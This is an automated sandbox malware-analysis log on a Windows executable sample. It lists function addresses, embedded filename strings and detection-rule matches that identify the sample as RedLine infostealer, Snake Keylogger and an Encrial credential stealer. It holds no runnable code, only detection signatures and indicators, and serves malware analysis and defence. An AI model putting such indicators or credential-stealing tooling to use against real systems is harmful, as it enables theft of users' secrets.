                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_06459DA80_2_06459DA8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_064521B20_2_064521B2
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_065D22700_2_065D2270
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_065D0DC00_2_065D0DC0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_065D48000_2_065D4800
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_065D29580_2_065D2958
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_065D37280_2_065D3728
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_065D14A80_2_065D14A8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_065D30400_2_065D3040
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_065D1B880_2_065D1B88
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_065D225F0_2_065D225F
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_065D00400_2_065D0040
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_065D0DB20_2_065D0DB2
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_065D29470_2_065D2947
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_065D37170_2_065D3717
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_065D149A0_2_065D149A
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_065D302F0_2_065D302F
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_065D1B780_2_065D1B78
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_070AB9780_2_070AB978
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_070A1B4C0_2_070A1B4C
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_070A4BC80_2_070A4BC8
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: String function: 0040E1D8 appears 44 times
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234424634.000000000060E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234424634.000000000060E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamempclient.dllj% vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.00000000005FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3678137911.0000000000197000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234475804.000000000061D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234475804.000000000061D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamempclient.dllj% vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234391315.00000000005F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234391315.00000000005F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamempclient.dllj% vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeBinary or memory string: OriginalFilenameAubriella.exe4 vs 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, type: SAMPLEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 0.0.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
